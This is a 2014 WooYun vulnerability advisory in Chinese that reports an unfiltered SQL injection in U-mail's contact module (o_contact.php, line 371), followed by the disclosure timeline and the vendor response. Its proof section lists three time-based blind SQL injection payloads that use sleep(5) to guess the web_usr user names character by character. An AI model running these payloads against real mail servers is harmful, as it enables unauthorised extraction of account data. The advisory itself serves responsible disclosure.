漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-073212
漏洞标题:Umail最新版SQL注入(续)
相关厂商:U-mail
漏洞作者: pandas
提交时间:2014-08-20 18:58
修复时间:2014-11-18 18:58
公开时间:2014-11-18 18:58
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-20: 细节已通知厂商并且等待厂商处理中
2014-08-25: 厂商已经确认,细节仅向厂商公开
2014-08-28: 细节向第三方安全合作伙伴开放
2014-10-19: 细节向核心白帽子及相关领域专家公开
2014-10-29: 细节向普通白帽子公开
2014-11-08: 细节向实习白帽子公开
2014-11-18: 细节向公众公开
简要描述:
看到路人甲大神频频发威,.....
详细说明:
File: client\pab\module\o_contact.php
Line: 371
看到上面的注意1,没有单引号闭合,且代入数据库变量未过滤,存在注入。
此处不能回显,可以通过延时盲注来注出数据。
漏洞证明:
先来张延时证明注入存在:
逐位猜解:
1. or if(((select count(*) from web_usr where usr_name like 'a____') > 0), 0, sleep(5))# usr_name是a开头的,所以这一句很快执行完毕。
2. or if(((select count(*) from web_usr where usr_name like 'ab___') > 0), 0, sleep(5))# usr_name不是ab开头的,所以这一句就会去执行后面的sleep(5)
3. or if(((select count(*) from web_usr where usr_name like 'ad___') > 0), 0, sleep(5))# usr_name是ad开头的,这一句会很快执行
剩下的就是体力活了。
修复方案:
过滤
版权声明:转载请注明来源 pandas@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-08-25 09:34
厂商回复:
CNVD对原理进行核验,对于实例情况还在验证中,待处置。
最新状态:
暂无